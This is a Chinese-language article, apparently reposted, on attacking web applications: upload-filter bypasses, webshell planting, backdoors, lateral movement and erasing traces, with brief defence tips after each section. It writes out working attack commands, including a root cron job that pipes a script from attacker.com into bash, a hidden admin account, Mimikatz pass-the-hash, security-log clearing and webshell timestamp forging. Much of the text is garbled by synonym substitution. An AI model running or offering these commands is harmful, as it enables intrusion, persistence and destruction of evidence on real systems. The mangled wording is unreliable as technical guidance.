Web应用权限绕过与横向移动

目次

一、文件上传绕过与Webshell植入
攻击原理与技能实现
防御发起：
二、权限维持与后门潜伏技能
Windows体系后门
Linux体系后门
防御发起：
三、内网横向排泄焦点技能
网络隧道搭建
横向移动本领
防御发起：
四、陈迹打扫与反溯源战略
日志打扫技能
反溯源本领
防御发起：
总结

---

一、文件上传绕过与Webshell植入

攻击原理与技能实现

文件上传弊端的本质在于服务端未对用户上传内容举行充实行证。攻击者常通过以下本领绕过防御：

• ​​扩展名诱骗​​：
  
  
  
  • 双重扩展名（如shell.jpg.php）使用部门黑名单过滤逻辑弊端；
    
  • 空字节截断（%00）使服务端错误剖析文件名（如test.php%00.jpg被辨以为PHP文件）。
    
  
  
• ​​内容伪装​​：
  
  
  
  • 修改HTTP哀求的Content-Type为image/jpeg，绕过MIME范例检测；
    
  • 图片马技能将恶意代码嵌入图片EXIF元数据，共同本地/长途文件包罗弊端触发实行。
    
  
  

​​实战案例​​：
攻击者通过上传.htaccess文件并设置AddType application/x-httpd-php .jpg，使全部JPG文件被剖析为PHP脚本。通过Burp Suite拦截哀求，修改文件名与内容，乐成植入Webshell。
防御发起：

• ​​输入验证​​：接纳白名单机制限定文件范例，而非依赖黑名单；
  
• ​​文件隔离​​：将上传目次设置为无实行权限，并通过CDN分发静态资源；
  
• ​​动态检测​​：使用沙箱分析文件运动，辨认潜伏的恶意代码。
  

---

二、权限维持与后门潜伏技能

Windows体系后门

• ​​注册表自启动​​：
  
  1. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Update" /t REG_SZ /d "C:\malware.exe"

  复制代码
  此类后门在体系启动时主动加载，常共同历程注入技能实现潜伏性。
  
• ​​潜伏用户创建​​：
  
  1. net user admin$ P@ssw0rd! /add /hidden

  复制代码
  带$符号的用户在下令行中不可见，但可通过注册表SAM项查询发现。
  

Linux体系后门

• ​​SSH密钥植入​​：
  修改/etc/ssh/sshd_config，添加AuthorizedKeysFile /dev/shm/.ssh/keys指向攻击者公钥文件。
  
• ​​定时使命恒久化​​：
  
  1. echo "*/5 * * * * root curl http://attacker.com/shell.sh | bash" >> /etc/crontab

  复制代码
  此类使命可实现定期反弹Shell或更新恶意负载。
  

防御发起：

• ​​日志监控​​：定期查抄体系日志（如Windows变乱日志、Linux的auth.log）中的非常历程启动记载；
  
• ​​权限最小化​​：限定用户对注册表和体系目次的写入权限。
  

---

三、内网横向排泄焦点技能

网络隧道搭建

• ​​HTTP署理隧道​​：
  使用reGeorg将流量封装在HTTP哀求中，绕过防火墙检测：
  
  1. python reGeorgSocksProxy.py -p 8080 -u http://target/tunnel.php

  复制代码
  该工具支持多级跳板，得当穿透隔离网络。
  
• ​​多协议级联​​：
  EW工具支持SOCKS5与ICMP隧道肴杂署理，通过ssocksd模块实现流量中转。
  

横向移动本领

• ​​Pass-the-Hash攻击​​：
  使用Mimikatz提取内存中的NTLM哈希：
  
  1. mimikatz.exe "sekurlsa::pth /user:admin /domain:corp /ntlm:<hash>"

  复制代码
  团结Impacket的psexec.py直接实行长途下令。
  
• ​​弊端使用​​：
  针对未修复的MS17-010（永恒之蓝），使用Metasploit模块exploit/windows/smb/ms17_010_eternalblue获取体系权限。
  

防御发起：

• ​​网络分段​​：将焦点业务与办公网络隔离，限定SMB、RDP等高危端口的袒露；
  
• ​​补丁管理​​：启用主动更新，重点修复CVSS评分≥7.0的弊端。
  

---

四、陈迹打扫与反溯源战略

日志打扫技能

• ​​Windows体系​​：
  
  1. wevtutil cl Security /q

  复制代码
  打扫安全变乱日志，需管理员权限。
  
• ​​Linux体系​​：
  
  1. shred -zu /var/log/auth.log

  复制代码
  使用安全擦除工具覆盖日志文件。
  

反溯源本领

• ​​流量伪装​​：
  通过TOR网络或I2P实现流量匿名化，共同多层署理（如Proxychains）潜伏真实IP。
  
• ​​时间戳伪造​​：
  
  1. touch -t 202404010900 /var/www/shell.php

  复制代码
  ​​修改文件时间与体系日志记载匹配，规避时间轴分析。
  

防御发起：

• ​​日志备份​​：将日志实时同步至独立存储服务器，防止本地篡改；
  
• ​​运动分析​​：摆设UEBA体系检测非常登录时间和地理位置。
  

---

总结

Web应用安全攻防是连续对抗的过程。攻击者通过技能创新突破防线，而防御者需从​​弊端管理​​、​​权限控制​​和​​运动监控​​三方面构建纵深防御体系。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。